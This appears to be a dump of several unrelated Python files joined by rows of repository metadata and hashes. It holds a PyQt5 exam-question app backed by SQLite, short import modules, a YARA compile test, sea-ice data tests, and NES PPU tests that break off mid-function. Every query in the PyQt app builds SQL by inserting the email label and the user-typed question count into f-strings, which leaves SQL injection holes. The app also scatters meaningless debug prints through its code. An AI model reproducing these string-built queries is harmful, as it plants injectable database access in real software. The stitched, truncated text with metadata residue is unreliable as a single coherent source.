pixmap.loadFromData(image, 'png')
print("error")
imagelabel.setPixmap(pixmap)
print("error")
return imagelabel
except Exception as e:
print(e)
def getImageLabelOb(self, image):
try:
imagelabel = QtWidgets.QLabel(self.centralwidget)
imagelabel.setText("")
imagelabel.setScaledContents(True)
pixmap = QtGui.QPixmap()
print("error")
pixmap.loadFromData(image, 'JPEG')
print("error")
imagelabel.setPixmap(pixmap)
print("error")
return imagelabel
except Exception as e:
print(e)
def fullfecth(self):
#self.no = self.lineEdit.text()
self.sub = self.comboBox.currentText()
self.typ = self.comboBox_2.currentText()
self.email = self.label0.text()
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
if self.sub == 'Calculus' and self.typ == 'Subjective':
self.TitleS.setText("Calculus")
self.TitleS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
self.TypeS.setText("Subjective")
self.TypeS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
try:
cur.execute(f"SELECT Question, QDes FROM CalculusSub WHERE EMAIL = '{self.email}';")
result = cur.fetchall()
print(result)
self.tableView.setRowCount(0)
print('e')
for row_number, row_data in enumerate(result):
print('e')
self.tableView.insertRow(row_number)
print('e')
for column_number, data in enumerate(row_data):
print('e')
item = str(data)
print('e')
if column_number == 0:
print('e')
item = self.getImageLabelSub(data)
print('e')
self.tableView.setCellWidget(row_number, column_number, item)
print('e')
else:
self.tableView.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(item))
conn.commit()
conn.close()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText(str(e))
self.Dialog.setWindowTitle("Sqlite3 Error")
self.Dialog.show()
elif self.sub == 'Calculus' and self.typ == 'Objective':
self.TitleS.setText("Calculus")
self.TitleS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
self.TypeS.setText("Objective")
self.TypeS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
try:
cur.execute(f"SELECT Question, QDes FROM CalculusOb WHERE EMAIL = '{self.email}';")
result = cur.fetchall()
print(result)
self.tableView.setRowCount(0)
for row_number, row_data in enumerate(result):
self.tableView.insertRow(row_number)
for column_number, data in enumerate(row_data):
item = str(data)
if column_number == 0:
item = self.getImageLabelOb(data)
self.tableView.setCellWidget(row_number, column_number, item)
else:
self.tableView.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(item))
conn.commit()
conn.close()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText(str(e))
self.Dialog.setWindowTitle("Sqlite3 Error")
self.Dialog.show()
elif self.sub == "Probability" and self.typ == "Subjective":
self.TitleS.setText("Probability")
self.TitleS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
self.TypeS.setText("Subjective")
self.TypeS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
try:
cur.execute(f"SELECT Question, QDes FROM ProbabilitySub WHERE Email = '{self.email}';")
result = cur.fetchall()
print(result)
self.tableView.setRowCount(0)
for row_number, row_data in enumerate(result):
self.tableView.insertRow(row_number)
for column_number, data in enumerate(row_data):
item = str(data)
if column_number == 0:
item = self.getImageLabelSub(data)
self.tableView.setCellWidget(row_number, column_number, item)
else:
self.tableView.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(item))
conn.commit()
conn.close()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText(str(e))
self.Dialog.setWindowTitle("Sqlite3 Error")
self.Dialog.show()
elif self.sub == "Probability" and self.typ == "Objective":
self.TitleS.setText("Probability")
self.TitleS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
self.TypeS.setText("Objective")
self.TypeS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
try:
cur.execute(f"SELECT Question, QDes FROM ProbabilityOb WHERE Email = '{self.email}';")
result = cur.fetchall()
print(result)
self.tableView.setRowCount(0)
for row_number, row_data in enumerate(result):
self.tableView.insertRow(row_number)
for column_number, data in enumerate(row_data):
item = str(data)
if column_number == 0:
item = self.getImageLabelOb(data)
self.tableView.setCellWidget(row_number, column_number, item)
else:
self.tableView.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(item))
conn.commit()
conn.close()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText(str(e))
self.Dialog.setWindowTitle("Sqlite3 Error")
self.Dialog.show()
elif self.sub == "Linear Algebra" and self.typ == "Subjective":
self.TitleS.setText("Linear Algebra")
self.TitleS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
self.TypeS.setText("Subjective")
self.TypeS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
try:
cur.execute(f"SELECT Question, QDes FROM LinearSub WHERE Email = '{self.email}';")
result = cur.fetchall()
print(result)
self.tableView.setRowCount(0)
for row_number, row_data in enumerate(result):
self.tableView.insertRow(row_number)
for column_number, data in enumerate(row_data):
item = str(data)
if column_number == 0:
item = self.getImageLabelSub(data)
self.tableView.setCellWidget(row_number, column_number, item)
else:
self.tableView.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(item))
conn.commit()
conn.close()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText(str(e))
self.Dialog.setWindowTitle("Sqlite3 Error")
self.Dialog.show()
elif self.sub == "Linear Algebra" and self.typ == "Objective":
self.TitleS.setText("Linear Algebra")
self.TitleS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
self.TypeS.setText("Objective")
self.TypeS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
try:
cur.execute(f"SELECT Question, QDes FROM LinearOb WHERE Email = '{self.email}';")
result = cur.fetchall()
print(result)
self.tableView.setRowCount(0)
for row_number, row_data in enumerate(result):
self.tableView.insertRow(row_number)
for column_number, data in enumerate(row_data):
item = str(data)
if column_number == 0:
item = self.getImageLabelOb(data)
self.tableView.setCellWidget(row_number, column_number, item)
else:
self.tableView.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(item))
conn.commit()
conn.close()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText(str(e))
self.Dialog.setWindowTitle("Sqlite3 Error")
self.Dialog.show()
def viewRandomly(self):
self.no = self.lineEdit.text()
self.sub = self.comboBox.currentText()
self.typ = self.comboBox_2.currentText()
self.email = self.label0.text()
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
if self.sub == 'Calculus' and self.typ == 'Subjective':
self.TitleS.setText("Calculus")
self.TitleS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
self.TypeS.setText("Subjective")
self.TypeS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
try:
cur.execute(f"SELECT Question, QDes FROM CalculusSub WHERE EMAIL = '{self.email}' ORDER BY Random() LIMIT '{self.no}'")
result = cur.fetchall()
print(result)
self.tableView.setRowCount(0)
print('e')
for row_number, row_data in enumerate(result):
print('e')
self.tableView.insertRow(row_number)
print('e')
for column_number, data in enumerate(row_data):
print('e')
item = str(data)
print('e')
if column_number == 0:
print('e')
item = self.getImageLabelSub(data)
print('e')
self.tableView.setCellWidget(row_number, column_number, item)
print('e')
else:
self.tableView.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(item))
#conn.commit()
#conn.close()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText(str(e))
self.Dialog.setWindowTitle("Sqlite3 Error")
self.Dialog.show()
elif self.sub == 'Calculus' and self.typ == 'Objective':
self.TitleS.setText("Calculus")
self.TitleS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
self.TypeS.setText("Objective")
self.TypeS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
try:
cur.execute(f"SELECT Question, QDes FROM CalculusOb WHERE EMAIL = '{self.email}' ORDER BY Random() LIMIT '{self.no}'")
result = cur.fetchall()
print(result)
self.tableView.setRowCount(0)
for row_number, row_data in enumerate(result):
self.tableView.insertRow(row_number)
for column_number, data in enumerate(row_data):
item = str(data)
if column_number == 0:
item = self.getImageLabelOb(data)
self.tableView.setCellWidget(row_number, column_number, item)
else:
self.tableView.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(item))
#conn.commit()
#conn.close()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText(str(e))
self.Dialog.setWindowTitle("Sqlite3 Error")
self.Dialog.show()
elif self.sub == "Probability" and self.typ == "Subjective":
self.TitleS.setText("Probability")
self.TitleS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
self.TypeS.setText("Subjective")
self.TypeS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
try:
cur.execute(f"SELECT Question, QDes FROM ProbabilitySub WHERE Email = '{self.email}'ORDER BY Random() LIMIT '{self.no}'")
result = cur.fetchall()
print(result)
self.tableView.setRowCount(0)
for row_number, row_data in enumerate(result):
self.tableView.insertRow(row_number)
for column_number, data in enumerate(row_data):
item = str(data)
if column_number == 0:
item = self.getImageLabelSub(data)
self.tableView.setCellWidget(row_number, column_number, item)
else:
self.tableView.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(item))
#conn.commit()
#conn.close()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText(str(e))
self.Dialog.setWindowTitle("Sqlite3 Error")
self.Dialog.show()
elif self.sub == "Probability" and self.typ == "Objective":
self.TitleS.setText("Probability")
self.TitleS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
self.TypeS.setText("Objective")
self.TypeS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
try:
cur.execute(f"SELECT Question, QDes FROM ProbabilityOb WHERE Email = '{self.email}'ORDER BY Random() LIMIT '{self.no}'")
result = cur.fetchall()
print(result)
self.tableView.setRowCount(0)
for row_number, row_data in enumerate(result):
self.tableView.insertRow(row_number)
for column_number, data in enumerate(row_data):
item = str(data)
if column_number == 0:
item = self.getImageLabelOb(data)
self.tableView.setCellWidget(row_number, column_number, item)
else:
self.tableView.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(item))
#conn.commit()
#conn.close()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText(str(e))
self.Dialog.setWindowTitle("Sqlite3 Error")
self.Dialog.show()
elif self.sub == "Linear Algebra" and self.typ == "Subjective":
self.TitleS.setText("Linear Algebra")
self.TitleS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
self.TypeS.setText("Subjective")
self.TypeS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
try:
cur.execute(f"SELECT Question, QDes FROM LinearSub WHERE Email = '{self.email}'ORDER BY Random() LIMIT '{self.no}'")
result = cur.fetchall()
print(result)
self.tableView.setRowCount(0)
for row_number, row_data in enumerate(result):
self.tableView.insertRow(row_number)
for column_number, data in enumerate(row_data):
item = str(data)
if column_number == 0:
item = self.getImageLabelSub(data)
self.tableView.setCellWidget(row_number, column_number, item)
else:
self.tableView.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(item))
#conn.commit()
#conn.close()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText(str(e))
self.Dialog.setWindowTitle("Sqlite3 Error")
self.Dialog.show()
elif self.sub == "Linear Algebra" and self.typ == "Objective":
self.TitleS.setText("Linear Algebra")
self.TitleS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
self.TypeS.setText("Objective")
self.TypeS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
try:
cur.execute(f"SELECT Question, QDes FROM LinearOb WHERE Email = '{self.email}'ORDER BY Random() LIMIT '{self.no}'")
result = cur.fetchall()
print(result)
self.tableView.setRowCount(0)
for row_number, row_data in enumerate(result):
self.tableView.insertRow(row_number)
for column_number, data in enumerate(row_data):
item = str(data)
if column_number == 0:
item = self.getImageLabelOb(data)
self.tableView.setCellWidget(row_number, column_number, item)
else:
self.tableView.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(item))
conn.commit()
conn.close()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText(str(e))
self.Dialog.setWindowTitle("Sqlite3 Error")
self.Dialog.show()
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "New Assessment"))
MainWindow.setWindowIcon(QIcon("Splashlogo.png"))
self.label.setText(_translate("MainWindow", "Select Subject"))
self.label_2.setText(_translate("MainWindow", "Select Question Type"))
self.label_3.setText(_translate("MainWindow", "Enter No of Questions"))
self.label_4.setText(_translate("MainWindow", "Instructor Name"))
self.label_5.setText(_translate("MainWindow", "Date"))
self.label_6.setText(_translate("MainWindow", "Time"))
self.label_8.setText(_translate("MainWindow", "Course Code"))
self.label_9.setText(_translate("MainWindow", "Course Title"))
self.label_10.setText(_translate("MainWindow", "Total Marks"))
self.label_11.setText(_translate("MainWindow", "Enter Examination Type"))
self.label_12.setText(_translate("MainWindow", "Semester Type with Year"))
self.label_13.setText(_translate("MainWindow", "Estimated Time"))
self.label_14.setText(_translate("MainWindow", "Instruction for Students"))
self.label_15.setText(_translate("MainWindow", "PDF Name"))
self.TitleS.setText(_translate("MainWindow", "Linear Algebra"))
self.TypeS.setText(_translate("MainWindow", "Subjective"))
self.Ques.setText(_translate("MainWindow", "Questions"))
self.RandomSearch.setText(_translate("MainWindow", "Randomly Fetch"))
self.GenerateDoc.setText(_translate("MainWindow", "Generate Assessment Save"))
self.AllFetch.setText(_translate("MainWindow", "ALL Fetch"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_NewAssessment()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| 48.359731
| 195
| 0.475442
| 9,104
| 93,431
| 4.820299
| 0.04866
| 0.034637
| 0.012442
| 0.016407
| 0.840101
| 0.817701
| 0.774565
| 0.770463
| 0.762556
| 0.761234
| 0
| 0.031885
| 0.399803
| 93,431
| 1,931
| 196
| 48.384775
| 0.750682
| 0.022316
| 0
| 0.814354
| 0
| 0.024911
| 0.191002
| 0.017794
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004745
| false
| 0
| 0.008897
| 0
| 0.015421
| 0.072361
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f1148f03a43edc5e6c16cf40f680a9c24e05ec19
| 141
|
py
|
Python
|
cfpq_data/grammars/readwrite/__init__.py
|
viabzalov/CFPQ_Data
|
67239c876897d04ba2f4ef88a75fd4a38a494efa
|
[
"Apache-2.0"
] | 8
|
2020-03-30T17:47:31.000Z
|
2022-01-27T13:36:39.000Z
|
cfpq_data/grammars/readwrite/__init__.py
|
viabzalov/CFPQ_Data
|
67239c876897d04ba2f4ef88a75fd4a38a494efa
|
[
"Apache-2.0"
] | 27
|
2019-10-21T09:31:08.000Z
|
2021-11-07T03:19:15.000Z
|
cfpq_data/grammars/readwrite/__init__.py
|
viabzalov/CFPQ_Data
|
67239c876897d04ba2f4ef88a75fd4a38a494efa
|
[
"Apache-2.0"
] | 14
|
2019-10-18T12:49:47.000Z
|
2021-08-03T14:20:17.000Z
|
from cfpq_data.grammars.readwrite.cfg import *
from cfpq_data.grammars.readwrite.cnf import *
from cfpq_data.grammars.readwrite.rsm import *
| 35.25
| 46
| 0.829787
| 21
| 141
| 5.428571
| 0.428571
| 0.210526
| 0.315789
| 0.526316
| 0.868421
| 0.614035
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 141
| 3
| 47
| 47
| 0.883721
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
f115b2964c42b393b769510c1dd8502827d68bde
| 64
|
py
|
Python
|
features/__main__.py
|
ririw/kaggle-bimbo-pymc3
|
fbf016751e2459b9fa6c8d058aad9c75fca57731
|
[
"MIT"
] | null | null | null |
features/__main__.py
|
ririw/kaggle-bimbo-pymc3
|
fbf016751e2459b9fa6c8d058aad9c75fca57731
|
[
"MIT"
] | null | null | null |
features/__main__.py
|
ririw/kaggle-bimbo-pymc3
|
fbf016751e2459b9fa6c8d058aad9c75fca57731
|
[
"MIT"
] | null | null | null |
from features import make_train_batch
print(make_train_batch())
| 21.333333
| 37
| 0.859375
| 10
| 64
| 5.1
| 0.7
| 0.352941
| 0.54902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078125
| 64
| 3
| 38
| 21.333333
| 0.864407
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
f1199784f7eb9fbe66e86d8f2fce81be0ae1045b
| 259
|
py
|
Python
|
tests/test_yara.py
|
BA7JCM/RATDecoders
|
d675ba1c06e6dd8365149c9ee8a8db1a6e5e508e
|
[
"MIT"
] | 905
|
2015-01-16T23:56:49.000Z
|
2022-03-28T14:00:58.000Z
|
tests/test_yara.py
|
BA7JCM/RATDecoders
|
d675ba1c06e6dd8365149c9ee8a8db1a6e5e508e
|
[
"MIT"
] | 38
|
2015-01-26T08:46:50.000Z
|
2021-05-23T03:24:44.000Z
|
tests/test_yara.py
|
BA7JCM/RATDecoders
|
d675ba1c06e6dd8365149c9ee8a8db1a6e5e508e
|
[
"MIT"
] | 319
|
2015-01-09T21:18:26.000Z
|
2022-03-10T01:41:53.000Z
|
# Just a simple compile
import yara
def test_yara_pe():
yara.compile(source='import "pe" rule a { condition: false }')
def test_yara_dotnet():
yara.compile(source='import "dotnet" rule a { condition: false }')
def test_yara_compile():
pass
| 17.266667
| 70
| 0.687259
| 37
| 259
| 4.648649
| 0.405405
| 0.122093
| 0.19186
| 0.267442
| 0.348837
| 0.348837
| 0.348837
| 0
| 0
| 0
| 0
| 0
| 0.189189
| 259
| 14
| 71
| 18.5
| 0.819048
| 0.081081
| 0
| 0
| 0
| 0
| 0.353448
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| true
| 0.142857
| 0.428571
| 0
| 0.857143
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
2d01b8faa65abcee85528f546719f85e843e20ba
| 6,553
|
py
|
Python
|
seaice/tools/plotter/test/test_monthly_extent.py
|
andypbarrett/nsidc-seaice
|
167a16309f7eaadd5c613b54a7df26eb1f48c2f3
|
[
"MIT"
] | 2
|
2020-08-27T08:40:22.000Z
|
2021-04-14T15:42:09.000Z
|
seaice/tools/plotter/test/test_monthly_extent.py
|
andypbarrett/nsidc-seaice
|
167a16309f7eaadd5c613b54a7df26eb1f48c2f3
|
[
"MIT"
] | null | null | null |
seaice/tools/plotter/test/test_monthly_extent.py
|
andypbarrett/nsidc-seaice
|
167a16309f7eaadd5c613b54a7df26eb1f48c2f3
|
[
"MIT"
] | null | null | null |
import unittest
import numpy as np
import pandas as pd
import seaice.tools.plotter.monthly_extent as plt
class Test_MissingAnchorPoints(unittest.TestCase):
def test_gets_indices_of_data_adjacent_to_missing_data(self):
x = np.array([1979., 1980., 1981., 1982., 1983., 1984., 1985., 1986.,
1987., 1988., 1989., 1990., 1991., 1992., 1993., 1994.,
1995., 1996., 1997., 1998., 1999., 2000., 2001., 2002.,
2003., 2004., 2005., 2006., 2007., 2008., 2009., 2010.,
2011., 2012., 2013., 2014.])
y = np.ma.array([15.46, 15.49, 15.12, 15.57, 15.3, 15.15, 15.34,
15.15, 15.33, 15.21, np.nan, 14.68, 14.93, 14.7,
15.18, 14.95, 14.59, 14.22, 14.59, 14.89, 15.13,
np.nan, np.nan, 14.37, 14.57, 14.11, 14.07, 13.97,
13.87, 14.42, 14.57, 14.7, 14.16, 14.72, 14.36, 14.14])
df = pd.DataFrame({'data': y, 'year': x}, index=x)
actual = plt._missing_boundaries(df.data)
expected = [[9, 11], [20, 23]]
self.assertEqual(actual, expected)
def test_with_no_missing_data(self):
x = np.array([1979., 1980., 1981., 1982., 1983., 1984., 1985., 1986.,
1987., 1988., 1989., 1990., 1991., 1992., 1993., 1994.,
1995., 1996., 1997., 1998., 1999., 2000., 2001., 2002.,
2003., 2004., 2005., 2006., 2007., 2008., 2009., 2010.,
2011., 2012., 2013., 2014.])
y = np.ma.array([15.46, 15.49, 15.12, 15.57, 15.3, 15.15, 15.34,
15.15, 15.33, 15.21, 14.44, 14.68, 14.93, 14.7,
15.18, 14.95, 14.59, 14.22, 14.59, 14.89, 15.13,
14.63, 14.86, 14.37, 14.57, 14.11, 14.07, 13.97,
13.87, 14.42, 14.57, 14.7, 14.16, 14.72, 14.36, 14.14])
df = pd.DataFrame({'data': y}, index=x)
actual = plt._missing_boundaries(df.data)
expected = []
self.assertEqual(actual, expected)
def test_with_missing_data_at_end(self):
x = np.array([1979., 1980., 1981., 1982., 1983., 1984., 1985., 1986.,
1987., 1988., 1989., 1990., 1991., 1992., 1993., 1994.,
1995., 1996., 1997., 1998., 1999., 2000., 2001., 2002.,
2003., 2004., 2005., 2006., 2007., 2008., 2009., 2010.,
2011., 2012., 2013., 2014.])
y = np.ma.array([15.46, 15.49, 15.12, 15.57, 15.3, 15.15, 15.34,
15.15, 15.33, 15.21, np.nan, 14.68, 14.93, 14.7,
15.18, 14.95, 14.59, 14.22, 14.59, 14.89, 15.13,
np.nan, np.nan, 14.37, 14.57, 14.11, 14.07, 13.97,
13.87, 14.42, 14.57, 14.7, 14.16, 14.72, 14.36, np.nan])
self.assertEqual(len(x), len(y))
df = pd.DataFrame({'data': y, 'year': x}, index=x)
actual = plt._missing_boundaries(df.data)
expected = [[9, 11], [20, 23]]
self.assertEqual(actual, expected)
def test_with_missing_data_almost_at_end(self):
x = np.array([1979., 1980., 1981., 1982., 1983., 1984., 1985., 1986.,
1987., 1988., 1989., 1990., 1991., 1992., 1993., 1994.,
1995., 1996., 1997., 1998., 1999., 2000., 2001., 2002.,
2003., 2004., 2005., 2006., 2007., 2008., 2009., 2010.,
2011., 2012., 2013., 2014.])
y = np.ma.array([15.46, 15.49, 15.12, 15.57, 15.3, 15.15, 15.34,
15.15, 15.33, 15.21, np.nan, 14.68, 14.93, 14.7,
15.18, 14.95, 14.59, 14.22, 14.59, 14.89, 15.13,
np.nan, np.nan, 14.37, 14.57, 14.11, 14.07, 13.97,
13.87, 14.42, 14.57, 14.7, 14.16, 14.72, np.nan, 14.36])
df = pd.DataFrame({'data': y, 'year': x}, index=x)
actual = plt._missing_boundaries(df.data)
expected = [[9, 11], [20, 23], [33, 35]]
self.assertEqual(actual, expected)
def test_with_missing_data_at_beginning(self):
x = np.array([1979., 1980., 1981., 1982., 1983., 1984., 1985., 1986.,
1987., 1988., 1989., 1990., 1991., 1992., 1993., 1994.,
1995., 1996., 1997., 1998., 1999., 2000., 2001., 2002.,
2003., 2004., 2005., 2006., 2007., 2008., 2009., 2010.,
2011., 2012., 2013., 2014.])
y = np.ma.array([np.nan, 15.49, 15.12, 15.57, 15.3, 15.15, 15.34,
15.15, 15.33, 15.21, np.nan, 14.68, 14.93, 14.7,
15.18, 14.95, 14.59, 14.22, 14.59, 14.89, 15.13,
np.nan, np.nan, 14.37, 14.57, 14.11, 14.07, 13.97,
13.87, 14.42, 14.57, 14.7, 14.16, 14.72, 14.36, 15.46])
self.assertEqual(len(x), len(y))
df = pd.DataFrame({'data': y, 'year': x}, index=x)
actual = plt._missing_boundaries(df.data)
expected = [[9, 11], [20, 23]]
self.assertEqual(actual, expected)
def test_with_missing_data_almost_at_beginning(self):
x = np.array([1979., 1980., 1981., 1982., 1983., 1984., 1985., 1986.,
1987., 1988., 1989., 1990., 1991., 1992., 1993., 1994.,
1995., 1996., 1997., 1998., 1999., 2000., 2001., 2002.,
2003., 2004., 2005., 2006., 2007., 2008., 2009., 2010.,
2011., 2012., 2013., 2014.])
y = np.ma.array([15.49, np.nan, 15.12, 15.57, 15.3, 15.15, 15.34,
15.15, 15.33, 15.21, np.nan, 14.68, 14.93, 14.7,
15.18, 14.95, 14.59, 14.22, 14.59, 14.89, 15.13,
np.nan, np.nan, 14.37, 14.57, 14.11, 14.07, 13.97,
13.87, 14.42, 14.57, 14.7, 14.16, 14.72, 14.36, 15.46])
self.assertEqual(len(x), len(y))
df = pd.DataFrame({'data': y, 'year': x}, index=x)
actual = plt._missing_boundaries(df.data)
expected = [[0, 2], [9, 11], [20, 23]]
self.assertEqual(actual, expected)
| 46.475177
| 88
| 0.447734
| 925
| 6,553
| 3.12
| 0.128649
| 0.033264
| 0.024948
| 0.024948
| 0.926888
| 0.926888
| 0.926888
| 0.926888
| 0.914414
| 0.898475
| 0
| 0.407146
| 0.372196
| 6,553
| 140
| 89
| 46.807143
| 0.294361
| 0
| 0
| 0.785714
| 0
| 0
| 0.006714
| 0
| 0
| 0
| 0
| 0
| 0.091837
| 1
| 0.061224
| false
| 0
| 0.040816
| 0
| 0.112245
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
2d46e2b1310c147d85ecf41a0b56fa86f3a1ad4b
| 2,371
|
py
|
Python
|
pynes/tests/ppu_test.py
|
timgates42/pyNES
|
e385c7189eca44b9a9e0e781b28c8562e0647b0b
|
[
"BSD-3-Clause"
] | 1,046
|
2015-02-10T02:23:58.000Z
|
2022-03-16T02:42:02.000Z
|
pynes/tests/ppu_test.py
|
mcanthony/pyNES
|
5f6078c02ae1fe9c6fecb4a8490f82f8c721cf3b
|
[
"BSD-3-Clause"
] | 30
|
2015-02-11T15:21:10.000Z
|
2022-03-11T23:12:26.000Z
|
pynes/tests/ppu_test.py
|
mcanthony/pyNES
|
5f6078c02ae1fe9c6fecb4a8490f82f8c721cf3b
|
[
"BSD-3-Clause"
] | 132
|
2015-05-28T14:55:04.000Z
|
2021-12-09T18:58:45.000Z
|
import unittest
from pynes.game import PPU
class PPUTest(unittest.TestCase):
def setUp(self):
self.ppu = PPU()
def tearDown(self):
self.ppu = None
def test_ppu_toogle_nmi(self):
self.assertEquals(0b00000000, self.ppu.ctrl)
self.ppu.nmi_enable = True
self.assertEquals(0b10000000, self.ppu.ctrl)
self.assertEquals(True, self.ppu.nmi_enable)
self.ppu.nmi_enable = False
self.assertEquals(0b00000000, self.ppu.ctrl)
self.assertEquals(False, self.ppu.nmi_enable)
def test_ppu_toogle_sprite_table(self):
self.assertEquals(0b00000000, self.ppu.ctrl)
self.ppu.sprite_pattern_table = 1
self.assertEquals(0b00001000, self.ppu.ctrl)
self.ppu.sprite_pattern_table = 0
self.assertEquals(0b00000000, self.ppu.ctrl)
def test_ppu_toogle_background_table(self):
self.assertEquals(0b00000000, self.ppu.ctrl)
self.ppu.background_pattern_table = 1
self.assertEquals(0b00010000, self.ppu.ctrl)
self.ppu.background_pattern_table = 0
self.assertEquals(0b00000000, self.ppu.ctrl)
def test_ppu_toogle_sprite(self):
self.assertEquals(0b00000000, self.ppu.mask)
self.ppu.sprite_enable = True
self.assertEquals(0b00010000, self.ppu.mask)
self.assertEquals(True, self.ppu.sprite_enable)
